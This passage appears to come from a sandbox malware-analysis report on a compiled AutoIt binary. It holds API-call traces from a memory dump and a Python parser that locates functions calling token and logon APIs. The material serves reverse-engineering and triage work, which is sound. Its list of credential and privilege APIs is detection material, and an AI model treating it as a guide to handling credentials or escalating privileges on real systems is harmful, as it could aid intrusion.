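• Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
Similarity
• API ID: LogonUser
• Opcode ID: 722259240180c8f436a9edb6d8c16e1645cc2d476fd6190bacec8eacfcd9e3b5
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 00DCA78E
  • Part of subcall function 00DCA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DCA9ED
Memory Dump Source
• Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
Similarity
• Opcode ID: ff83ec2e7b545f234852a18dff1c333de98503229e126e35207b03e06457c1c3
APIs
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DD2CAC,00000000), ref: 00DB7B16
Memory Dump Source
• Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
Similarity
• String ID: $AutoIt v3$DISPLAY$static
• Opcode ID: ea3ab31e4052e393d1050288cf4863c789f10b102cab4f81ba50b88624f16214
"""

SUBCALL_RE = re.compile(r"^Part of subcall function ([0-9A-Fa-f]+):\s*(.*)$")
CALL_RE = re.compile(r"^(\w+)\.(\w+)(?:\([^)]*\))?,?\s*ref:\s*([0-9A-Fa-f]+)$")
DUMP_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)")
FIELD_RE = re.compile(r"^(API ID|String ID|Opcode ID):\s*(.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    va: int                     # call-site address taken from "ref:"
    via_subcall: Optional[str]  # callee address when listed as "Part of subcall function"


@dataclass
class FuncRecord:
    opcode_id: str = ""
    api_id: str = ""
    strings: list = field(default_factory=list)
    image_base: Optional[int] = None  # the dump's "Offset:"; a module base only if based_on_pe
    based_on_pe: bool = False
    calls: list = field(default_factory=list)

    def rva(self, call: ApiCall) -> Optional[int]:
        # Call-site RVA inside the dumped module; meaningless for a raw (non-PE) dump.
        return call.va - self.image_base if self.based_on_pe else None


def parse(text: str) -> list:
    """Split a Joe Sandbox function listing into FuncRecord objects."""
    records, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        # A record starts at "APIs", or at a dump source when the current record already has one.
        if line == "APIs" or (line == "Memory Dump Source" and (cur is None or cur.image_base is not None)):
            cur = FuncRecord()
            records.append(cur)
        if line in ("APIs", "Memory Dump Source", "Similarity"):
            in_apis = line == "APIs"
        elif in_apis:
            m = SUBCALL_RE.match(line)
            callee = m.group(1) if m else None
            m = CALL_RE.match(m.group(2).lstrip("•").strip() if m else line)
            if m:
                cur.calls.append(ApiCall(m.group(1), m.group(2), int(m.group(3), 16), callee))
        elif (m := DUMP_RE.search(line)):
            cur.image_base, cur.based_on_pe = int(m.group(1), 16), m.group(2) == "true"
        elif (m := FIELD_RE.match(line)):
            key, val = m.groups()
            if key == "Opcode ID":
                cur.opcode_id = val
            elif key == "API ID":
                cur.api_id = val
            else:  # "String ID" is a "$"-separated list, e.g. "$AutoIt v3$DISPLAY$static"
                cur.strings = [s for s in val.split("$") if s]
    return records


# Illustrative assumption: APIs worth locating in the dump when triaging credential handling.
TOKEN_LOGON_APIS = {"LogonUserW", "LogonUserA", "AdjustTokenPrivileges", "OpenProcessToken"}


def functions_calling(records: list, api_names: set) -> dict:
    """Opcode ID -> [(api, rva)] for every record that calls one of api_names."""
    hits = {}
    for rec in records:
        found = [(c.name, rec.rva(c)) for c in rec.calls if c.name in api_names]
        if found:
            hits[rec.opcode_id] = found
    return hits
```

With the listing above, AdjustTokenPrivileges at 00D981E0 and LogonUserW at 00D987D1 come out as RVAs 0x581E0 and 0x587D1 in the module dumped at 00D40000, which is where to set a breakpoint or look in the carved PE. The report flags the binary as a likely compiled AutoIt script, and the "AutoIt v3" string in the record above is the interpreter's own window class name, so functions like these are in all likelihood interpreter runtime code (its RunAs support uses LogonUser) rather than behaviour of the embedded script; use the hits to identify runtime code, not to judge the script.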
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DC3627
                            • IsWindowVisible.USER32(?), ref: 00DC364B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharUpperVisibleWindow
                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                            • API String ID: 4105515805-45149045
                            • Opcode ID: a5a80f1e95c05b93ac6d6c424453a8d195beffeaefd858ab111e1c01d4adab6e
                            • Instruction ID: d36fafd9fd0b14424d517847f8b6e7c1c476e141202478e213045acdb945dc18
                            • Opcode Fuzzy Hash: a5a80f1e95c05b93ac6d6c424453a8d195beffeaefd858ab111e1c01d4adab6e
                            • Instruction Fuzzy Hash: DAD15E302043029BCB04EF14C465F6EBBA1EF95394F15845CF9869B3A2DB31EA0ADB71
                            APIs
                            • SetTextColor.GDI32(?,00000000), ref: 00DCA630
                            • GetSysColorBrush.USER32 ref: 00DCA661
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,00D7B93A,?,?), ref: 00DCA66D
                            • SetBkColor.GDI32(?,000000FF), ref: 00DCA687
                            • SelectObject.GDI32(?,00000000), ref: 00DCA696
                            • InflateRect.USER32 ref: 00DCA6C1
                            • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,00D7B93A,?,?), ref: 00DCA6C9
                            • CreateSolidBrush.GDI32(00000000), ref: 00DCA6D0
                            • FrameRect.USER32 ref: 00DCA6DF
                            • DeleteObject.GDI32(00000000), ref: 00DCA6E6
                            • InflateRect.USER32 ref: 00DCA731
                            • FillRect.USER32 ref: 00DCA763
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCA78E
                              • Part of subcall function 00DCA8CA: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?), ref: 00DCA903
                              • Part of subcall function 00DCA8CA: SetTextColor.GDI32(?,?), ref: 00DCA907
                              • Part of subcall function 00DCA8CA: GetSysColorBrush.USER32 ref: 00DCA91D
                              • Part of subcall function 00DCA8CA: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA928
                              • Part of subcall function 00DCA8CA: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA945
                              • Part of subcall function 00DCA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DCA953
                              • Part of subcall function 00DCA8CA: SelectObject.GDI32(?,00000000), ref: 00DCA964
                              • Part of subcall function 00DCA8CA: SetBkColor.GDI32(?,00000000), ref: 00DCA96D
                              • Part of subcall function 00DCA8CA: SelectObject.GDI32(?,?), ref: 00DCA97A
                              • Part of subcall function 00DCA8CA: InflateRect.USER32 ref: 00DCA999
                              • Part of subcall function 00DCA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DCA9B0
                              • Part of subcall function 00DCA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00DCA9C5
                              • Part of subcall function 00DCA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DCA9ED
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                            • String ID:
                            • API String ID: 3521893082-0
                            • Opcode ID: ff83ec2e7b545f234852a18dff1c333de98503229e126e35207b03e06457c1c3
                            • Instruction ID: 073c85ec57aa879fa937b17cfc4c44aa3eae88b095dc73d37c8d5bc654e18d2b
                            • Opcode Fuzzy Hash: ff83ec2e7b545f234852a18dff1c333de98503229e126e35207b03e06457c1c3
                            • Instruction Fuzzy Hash: 43915D72008307AFD7119F64DC08E9B7BAAFF88325F144A29F5A2D62E1D771D944CB62
                            APIs
                            • DestroyWindow.USER32 ref: 00D42CA2
                            • DeleteObject.GDI32(00000000), ref: 00D42CE8
                            • DeleteObject.GDI32(00000000), ref: 00D42CF3
                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00D42CFE
                            • DestroyWindow.USER32 ref: 00D42D09
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D7C43B
                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D7C474
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D7C89D
                              • Part of subcall function 00D41B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00D41B9A
                            • SendMessageW.USER32(?,00001053), ref: 00D7C8DA
                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D7C8F1
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D7C907
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D7C912
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                            • String ID: 0
                            • API String ID: 464785882-4108050209
                            • Opcode ID: 23a8545cf4f8dfa0462a4d7a2c7a67bd36c15c61cd2e2e0a4adf6746e42ceac2
                            • Instruction ID: 7041c0b125559f30ef95ababdc4cc2e84f2f83ccb4831460bd81616e21fd9dd0
                            • Opcode Fuzzy Hash: 23a8545cf4f8dfa0462a4d7a2c7a67bd36c15c61cd2e2e0a4adf6746e42ceac2
                            • Instruction Fuzzy Hash: 58127C30614202AFDB25CF24C884BA9B7E5FF44310F98956DF599CB262DB31E842DBB1
                            APIs
                            • DestroyWindow.USER32 ref: 00DB74DE
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DB759D
                            • SetRect.USER32 ref: 00DB75DB
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00DB75ED
                            • CreateWindowExW.USER32 ref: 00DB7633
                            • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00DB763F
                            • CreateWindowExW.USER32 ref: 00DB7683
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DB7692
                            • GetStockObject.GDI32(00000011), ref: 00DB76A2
                            • SelectObject.GDI32(00000000,00000000), ref: 00DB76A6
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00DB76B6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00DB76BF
                            • DeleteDC.GDI32(00000000), ref: 00DB76C8
                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DB76F4
                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DB770B
                            • CreateWindowExW.USER32 ref: 00DB7746
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DB775A
                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DB776B
                            • CreateWindowExW.USER32 ref: 00DB779B
                            • GetStockObject.GDI32(00000011), ref: 00DB77A6
                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DB77B1
                            • ShowWindow.USER32(00000004), ref: 00DB77BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 656f35e69444ed45a91cc78876fc33ff711731e5a36d5b76e7d5e334150f1c2e
                            • Instruction ID: 051eccf39af3133ba966f82817873ec5b888d650d55fb935ffaacae4b4c583a7
                            • Opcode Fuzzy Hash: 656f35e69444ed45a91cc78876fc33ff711731e5a36d5b76e7d5e334150f1c2e
                            • Instruction Fuzzy Hash: C3A14D71A40606BFEB149BA5DC4AFAF7BBAEB44710F048114FA15E72E0C671AD04CB70
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAAD1E
                            • GetDriveTypeW.KERNEL32(?,00DCFAC0,?,\\.\,00DCF910), ref: 00DAADFB
                            • SetErrorMode.KERNEL32(00000000,00DCFAC0,?,\\.\,00DCF910), ref: 00DAAF59
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                            • API String ID: 2907320926-4222207086
                            • Opcode ID: 5ba12af84faeee2793e0baaa8e4b1dc1d939993c742375538b8bf62d0426707c
                            • Instruction ID: 0aa1050e2e7a9fa3a336ecc25510bb7e6851c22296686ac931a6b4e38b7e8a0a
                            • Opcode Fuzzy Hash: 5ba12af84faeee2793e0baaa8e4b1dc1d939993c742375538b8bf62d0426707c
                            • Instruction Fuzzy Hash: 545180B0644309AF8B14DB18C992CBDB3A1EF4A700B258257F547A7291DB31DE49EB73
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                            • API String ID: 1038674560-86951937
                            • Opcode ID: 5dd69e393bce407c6eaebed5e3bd51e917239aa56a6f792e91eed33736f5a8b2
                            • Instruction ID: 8c9274862788300d10e81c4e2726d690bb300042fb31ab479909214c64080400
                            • Opcode Fuzzy Hash: 5dd69e393bce407c6eaebed5e3bd51e917239aa56a6f792e91eed33736f5a8b2
                            • Instruction Fuzzy Hash: EF81E4B0600605BBCF20AB64EC43FBB3769EF16705F084025F946AB196EB71DE45D6B2
                            APIs
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103), ref: 00DC9AD2
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00DC9B8B
                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00DC9BA7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Window
                            • String ID: 0
                            • API String ID: 2326795674-4108050209
                            • Opcode ID: 7ea6ce194327e9d2427272e4fa0520e5b85c9adbc40a39e67ad11017800e8ef7
                            • Instruction ID: 7de86a92f9e1c08d6e11cc045db8d43b5b2578c65c45569c9742844ff7f29309
                            • Opcode Fuzzy Hash: 7ea6ce194327e9d2427272e4fa0520e5b85c9adbc40a39e67ad11017800e8ef7
                            • Instruction Fuzzy Hash: D602AB31105302AFDB258F24C869FAABBE5FF49314F08892DF999D72A1C735D944CB62
                            APIs
                            • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?), ref: 00DCA903
                            • SetTextColor.GDI32(?,?), ref: 00DCA907
                            • GetSysColorBrush.USER32 ref: 00DCA91D
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA928
                            • CreateSolidBrush.GDI32(?), ref: 00DCA92D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA945
                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DCA953
                            • SelectObject.GDI32(?,00000000), ref: 00DCA964
                            • SetBkColor.GDI32(?,00000000), ref: 00DCA96D
                            • SelectObject.GDI32(?,?), ref: 00DCA97A
                            • InflateRect.USER32 ref: 00DCA999
                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DCA9B0
                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00DCA9C5
                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DCA9ED
                            • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCAA14
                            • InflateRect.USER32 ref: 00DCAA32
                            • DrawFocusRect.USER32 ref: 00DCAA3D
                            • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00DCA5FA), ref: 00DCAA4B
                            • SetTextColor.GDI32(?,00000000), ref: 00DCAA53
                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00DCAA67
                            • SelectObject.GDI32(?,00DCA5FA), ref: 00DCAA7E
                            • DeleteObject.GDI32(?), ref: 00DCAA89
                            • SelectObject.GDI32(?,?), ref: 00DCAA8F
                            • DeleteObject.GDI32(?), ref: 00DCAA94
                            • SetTextColor.GDI32(?,?), ref: 00DCAA9A
                            • SetBkColor.GDI32(?,?), ref: 00DCAAA4
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                            • String ID:
                            • API String ID: 1996641542-0
                            • Opcode ID: 4bc5ef142fa764e3cd2a0057d3e934bd1d367abed7ea2a449f0c2dc08272458c
                            • Instruction ID: c8d23bfbe7408acec8557eed437dbf42c72ff0dd4d307d743b1623ea3b71c86e
                            • Opcode Fuzzy Hash: 4bc5ef142fa764e3cd2a0057d3e934bd1d367abed7ea2a449f0c2dc08272458c
                            • Instruction Fuzzy Hash: 72512C7190021AEFDB119FA8DC49EEE7B7AEF08320F154625F911EB2A1D7719940DFA0
                            APIs
                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00DC8AC1
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC8AD2
                            • CharNextW.USER32(0000014E), ref: 00DC8B01
                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00DC8B42
                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00DC8B58
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DC8B69
                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00DC8B86
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00DC8BD8
                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00DC8BEE
                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC8C1F
                            • _memset.LIBCMT ref: 00DC8C44
                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00DC8C8D
                            • _memset.LIBCMT ref: 00DC8CEC
                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DC8D16
                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DC8D6E
                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00DC8E1B
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC8E3D
                            • GetMenuItemInfoW.USER32 ref: 00DC8E87
                            • SetMenuItemInfoW.USER32 ref: 00DC8EB4
                            • DrawMenuBar.USER32(?), ref: 00DC8EC3
                            • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 00DC8EEB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                            • String ID: 0
                            • API String ID: 1073566785-4108050209
                            • Opcode ID: a5509f139724a8b207792780a658f10aadfc492a0144f2fa0b0f26e8ef17801a
                            • Instruction ID: 88b9fcee3506e46abfedda6dc20f595f82c55957b9225b64b77d43149e377e82
                            • Opcode Fuzzy Hash: a5509f139724a8b207792780a658f10aadfc492a0144f2fa0b0f26e8ef17801a
                            • Instruction Fuzzy Hash: 50E15B7190021AAFDB219F64CC84FEE7BB9EF05710F14815AF955AB290DB708A81EF70
                            APIs
                            • GetCursorPos.USER32(?), ref: 00DC49CA
                            • GetDesktopWindow.USER32 ref: 00DC49DF
                            • GetWindowRect.USER32(00000000), ref: 00DC49E6
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DC4A48
                            • DestroyWindow.USER32 ref: 00DC4A74
                            • CreateWindowExW.USER32 ref: 00DC4A9D
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC4ABB
                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00DC4AE1
                            • SendMessageW.USER32(?,00000421,?,?), ref: 00DC4AF6
                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00DC4B09
                            • IsWindowVisible.USER32(?), ref: 00DC4B29
                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00DC4B44
                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00DC4B58
                            • GetWindowRect.USER32(?,?), ref: 00DC4B70
                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00DC4B96
                            • GetMonitorInfoW.USER32(00000000,?), ref: 00DC4BB0
                            • CopyRect.USER32(?,?), ref: 00DC4BC7
                            • SendMessageW.USER32(?,00000412,00000000), ref: 00DC4C32
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                             • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                             • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                            • String ID: ($0$tooltips_class32
                            • API String ID: 698492251-4156429822
                            • Opcode ID: 832fd4b49fb218067cf4d75c758498ed00e424931d614d0f6f100645a9c2aabc
                            • Instruction ID: 0ed38403d16680702b5ac67a278fa7f9980a0527e6ecbd1621c2ce564cffb090
                            • Opcode Fuzzy Hash: 832fd4b49fb218067cf4d75c758498ed00e424931d614d0f6f100645a9c2aabc
                            • Instruction Fuzzy Hash: A0B17970604342AFDB04DF65C898F6ABBE5EF88314F008A1CF5999B2A1D771EC05CB65
                            APIs
                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00DA44AC
                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00DA44D2
                            • _wcscpy.LIBCMT ref: 00DA4500
                            • _wcscmp.LIBCMT ref: 00DA450B
                            • _wcscat.LIBCMT ref: 00DA4521
                            • _wcsstr.LIBCMT ref: 00DA452C
                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00DA4548
                            • _wcscat.LIBCMT ref: 00DA4591
                            • _wcscat.LIBCMT ref: 00DA4598
